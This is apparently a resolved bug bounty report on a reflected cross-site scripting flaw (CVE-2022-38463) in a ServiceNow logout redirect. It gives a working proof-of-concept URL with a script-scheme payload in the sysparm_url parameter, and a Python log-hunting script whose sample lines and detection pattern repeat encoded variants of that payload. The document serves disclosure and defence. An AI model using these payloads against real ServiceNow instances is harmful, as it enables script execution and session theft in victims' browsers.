XSS in ServiceNow logout https://████:443
Medium
Vulnerability Details
**Description:**
XSS in ServiceNow logout
https://██████:443/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)
## References
https://nvd.nist.gov/vuln/detail/CVE-2022-38463
## Impact
An unauthenticated remote attacker can execute code in the user's browser context. The user must click on a malicious link.
## System Host(s)
███████
## Affected Product(s) and Version(s)
ServiceNow prior to San Diego SP6
## CVE Numbers
CVE-2022-38463
## Steps to Reproduce
Click on https://█████:443/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)
## Suggested Mitigation/Remediation Actions
Upgrade to a patched version of ServiceNow.
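Until the upgrade is in place, web or proxy logs can be reviewed for requests to `logout_redirect.do` whose `sysparm_url` value decodes to a script scheme or an off-site target. The following is an added example, not part of the original report or of ServiceNow; the log lines are constructed, and the request-line log format and the `classify`/`hunt` names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed request lines; only the first mirrors the URL in this report.
# The third is double-encoded purely to exercise the normalisation step.
SAMPLE_LOG = [
    'GET /logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain) HTTP/1.1',
    'GET /logout_redirect.do?sysparm_url=/navpage.do HTTP/1.1',
    'GET /logout_redirect.do?sysparm_url=%2F%2Fj%255c%255cJavaScript%253Aalert(1) HTTP/1.1',
    'GET /logout_redirect.do?sysparm_url=https://idp.example.test/sso HTTP/1.1',
    'GET /login.do?sysparm_url=javascript:x HTTP/1.1',
]
SCRIPT_SCHEME = re.compile(r'(?:java|vb)script:', re.I)
FLAGGED = ('script-scheme', 'off-site')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so multiply-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_line):
    """Return 'script-scheme', 'off-site', 'ok', or None for other endpoints."""
    parts = request_line.split(' ')
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    if not url.path.lower().endswith('/logout_redirect.do'):
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get('sysparm_url', []):
        # Drop whitespace/control characters that browsers ignore in schemes.
        compact = re.sub(r'[\x00-\x20]', '', fully_decode(raw))
        if SCRIPT_SCHEME.search(compact):
            return 'script-scheme'
        if compact.startswith(('//', '\\\\', '/\\')) or '://' in compact:
            return 'off-site'  # absolute or protocol-relative redirect target
    return 'ok'

def hunt(lines):
    """Return (verdict, line) pairs for the requests that need review."""
    return [(v, l) for l in lines if (v := classify(l)) in FLAGGED]

if __name__ == '__main__':
    for verdict, line in hunt(SAMPLE_LOG):
        print(f'{verdict:14} {line}')
```

An `off-site` verdict is a review flag rather than proof of abuse, since a legitimate single sign-on logout may redirect to an external identity provider.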
Report Stats
- Report ID: 1699855
- State: Closed
- Substate: resolved
- Upvotes: 5